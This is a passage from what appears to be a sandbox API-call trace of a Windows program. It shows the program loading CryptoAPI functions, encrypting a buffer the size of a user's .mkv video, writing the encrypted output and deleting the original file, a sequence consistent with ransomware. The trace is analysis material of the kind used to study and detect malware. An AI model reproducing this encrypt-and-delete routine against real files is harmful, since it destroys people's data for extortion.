hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.283] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0109.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0109.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0109.284] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0109.285] CryptGetKeyParam (in: hKey=0x41ac040, dwParam=0x7, pbData=0x43e2950, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2950*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0109.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0109.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0109.287] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0109.287] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0109.287] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0109.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0109.289] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0109.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0109.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.291] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0109.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0109.291] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x10503, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x10510) returned 1 [0109.291] CharLowerBuffW (in: lpsz="byte[66833]", cchLength=0xb | out: lpsz="byte[66833]") returned 0xb [0109.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0109.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0109.293] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e088*=0x10503, dwBufLen=0x10510 | out: pbData=0x499a008*, pdwDataLen=0x144e088*=0x10510) returned 1 [0109.294] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0109.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0109.294] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.297] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x10510, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x10510, lpOverlapped=0x0) returned 1 [0109.299] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0109.299] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0109.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0109.300] CryptDestroyKey (hKey=0x41ac040) returned 1 [0109.300] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0109.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0109.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.300] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0109.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0109.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0109.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.300] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0109.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0109.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0109.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0109.300] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0109.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0109.301] FreeLibrary (hLibModule=0x756e0000) returned 1 [0109.301] CloseHandle (hObject=0x258) returned 1 [0109.301] CloseHandle (hObject=0x298) returned 1 [0109.358] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv", lpFilePart=0x0) returned 0x44 [0109.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0109.358] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\recat1.mkv")) returned 0x20 [0109.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0109.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0109.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0109.359] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120192a0, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xe49685f0, ftLastAccessTime.dwHighDateTime=0x1d5e597, ftLastWriteTime.dwLowDateTime=0xe49685f0, ftLastWriteTime.dwHighDateTime=0x1d5e597, nFileSizeHigh=0x0, nFileSizeLow=0x10503, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="recAT1.mkv", cAlternateFileName="")) returned 0x41ac540 [0109.359] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\recAT1.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\recat1.mkv")) returned 1 [0109.406] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120192a0, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xe49685f0, ftLastAccessTime.dwHighDateTime=0x1d5e597, ftLastWriteTime.dwLowDateTime=0xe49685f0, ftLastWriteTime.dwHighDateTime=0x1d5e597, nFileSizeHigh=0x0, nFileSizeLow=0x10503, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="recAT1.mkv", cAlternateFileName="")) returned 0 [0109.407] FindClose (in: hFindFile=0x41ac540 | out: 